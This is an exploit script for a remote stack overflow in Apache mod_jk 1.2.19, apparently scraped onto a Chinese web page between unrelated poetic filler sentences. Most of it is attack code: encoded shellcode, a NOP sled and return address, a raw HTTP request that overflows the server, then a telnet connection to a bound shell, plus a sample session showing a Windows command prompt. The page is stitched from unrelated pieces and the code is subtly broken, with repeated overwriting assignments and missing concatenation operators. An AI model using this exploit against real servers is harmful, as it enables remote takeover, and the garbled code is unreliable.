翟塘峡口曲江头,万里风烟接素秋。那遍地的绿草,那微风中轻轻摇曳的芦苇,那栖满了夜鹭的灌木丛,就像一幅立体的田园画,静静地展现在我的眼前。
#!/usr/bin/python#
# _____ _ _ _____ _____ _____ _____
# / ___| |_| | _ \| _ | _ |_ _|
# | (___| _ | [_)_/| (_) | (_) | | |
# \_____|_| |_|_| |_||_____|_____| |_|
# C. H. R. O. O. T. SECURITY GROUP
# - -- ----- --- -- -- ---- --- -- -
# http://www.chroot.org
#
# _ _ _ _____ ____ ____ __ _
# Hacks In Taiwan | |_| | |_ _| __| | \| |
# Conference 2008 | _ | | | | | (__| () | |
# |_| |_|_| |_| \____|____|_|\__|
# http://www.hitcon.org
#
#
# Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
# Author ======:: unohope [at] chroot [dot] org
#
# IRC =========:: irc.chroot.org #chroot
#
# ScriptName ==:: Apache Module mod_jk/1.2.19
#
# Vendor ======:: http://tomcat.apache.org/
#
# Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
#
# Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
# Apache/2.0.59 (Win32) mod_jk/1.2.19
#
# Greets ======:: zha0
#
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# usage: ./apx-jk_mod-1.2.19 <host>
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# [ ] connecting to 192.168.1.78 ...
#
# Trying 192.168.1.78...
# Connected to 192.168.1.78.
# Escape character is '^]'.
# Microsoft Windows XP [.. 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\AppServ\Apache2>
#
#
import os, sys, time
from socket import *
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
shellcode = "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68"
shellcode = "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32"
shellcode = "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43"
shellcode = "\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71"
shellcode = "\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c"
shellcode = "\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74"
shellcode = "\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66"
shellcode = "\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c"
shellcode = "\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b"
shellcode = "\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79"
shellcode = "\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54"
shellcode = "\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36"
shellcode = "\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30"
shellcode = "\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66"
shellcode = "\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73"
shellcode = "\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b"
shellcode = "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
shellcode = "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
shellcode = "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
shellcode = "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
shellcode = "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
shellcode = "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
shellcode = "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
shellcode = "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
shellcode = "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
shellcode = "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
shellcode = "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
shellcode = "\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39"
shellcode = "\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e"
shellcode = "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
shellcode = "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
shellcode = "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
shellcode = "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
shellcode = "\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70"
shellcode = "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
shellcode = "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
shellcode = "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
shellcode = "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
shellcode = "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
shellcode = "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
shellcode = "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
shellcode = "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
shellcode = "\x4f\x69\x46\x4b\x4f\x6e\x30\x68";
foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
nop = "\x90"
ret = "\xcc\x2a\xd9\x77"
buf = nop*foo_base shellcode nop*(buf_base - foo_base - len(shellcode) - buf_offset) ret
buf = "\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3" nop*(buf_offset - foo_base - 3)
def usage():
print 'usage: %s <host>\n' % sys.argv[0]
sys.exit(-1)
def xpl():
try:
print len(buf)
sockaddr = (host, 80)
s = socket(AF_INET, SOCK_STREAM)
s.connect(sockaddr)
payload = buf 'HTTP/1.0\r\nHost: %s\r\n\r\n\0' % host
s.send('GET /' payload)
s.close()
print ' [ ] connecting to %s ...\n' % host
time.sleep(3)
os.system("telnet %s 8888" % host)
except:
print ' [-] EXPLOIT FAILED!\n'
if __name__ == '__main__':
print 'Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\n'
try:
host = sys.argv[1]
except IndexError:
usage()
xpl()
# [NOTE]
#
# !! This is just for educational purposes, DO NOT use for illegal. !!
#
到此这篇关于Apache mod就介绍到这了。有朝一日左手牵着你夏夜露宿海边带上烟花和啤酒早晨叫醒你看日出的轮廓你坚持着说那是夕阳。更多相关Apache mod内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!